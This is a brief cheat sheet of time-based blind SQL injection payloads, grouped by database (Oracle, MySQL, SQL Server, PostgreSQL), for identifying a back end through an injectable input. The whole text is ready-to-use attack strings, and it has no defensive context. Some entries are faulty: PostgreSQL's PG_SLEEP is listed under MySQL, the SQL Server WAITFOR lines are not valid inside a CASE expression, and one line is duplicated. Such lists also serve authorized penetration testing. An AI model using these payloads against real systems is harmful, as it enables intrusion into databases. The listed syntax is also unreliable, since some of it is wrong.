Basic blind injections to test for database types:

ORACLE:
' UNION SELECT CASE WHEN (1=1) THEN DBMS_LOCK.SLEEP(10) ELSE NULL END, NULL FROM dual --
' UNION SELECT CASE WHEN (1=1) THEN UTL_INADDR.get_host_address('10.0.0.1') ELSE NULL END FROM dual --
' UNION SELECT CASE WHEN (1=1) THEN dbms_pipe.receive_message('a', 10) ELSE NULL END FROM dual --


MySQL:
' UNION SELECT IF(1=1, SLEEP(10), NULL) --
' UNION SELECT IF(1=1, BENCHMARK(1000000000, MD5(1)), NULL) --
' UNION SELECT IF(1=1, PG_SLEEP(10), NULL) --

SQL Server:
' UNION SELECT CASE WHEN (1=1) THEN WAITFOR DELAY '0:0:10' ELSE NULL END --
' UNION SELECT CASE WHEN (1=1) THEN WAITFOR TIME '22:10:00' ELSE NULL END --
' UNION SELECT CASE WHEN (1=1) THEN WAITFOR DELAY '0:0:10' ELSE NULL END --

PostgreSQL:
' UNION SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE NULL END --
' UNION SELECT CASE WHEN (SELECT 1=1) THEN pg_sleep(10) ELSE NULL END --
' UNION SELECT CASE WHEN (SELECT COUNT(*) FROM pg_database WHERE datname = 'postgres') > 0 THEN pg_sleep(10) ELSE NULL END --
'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
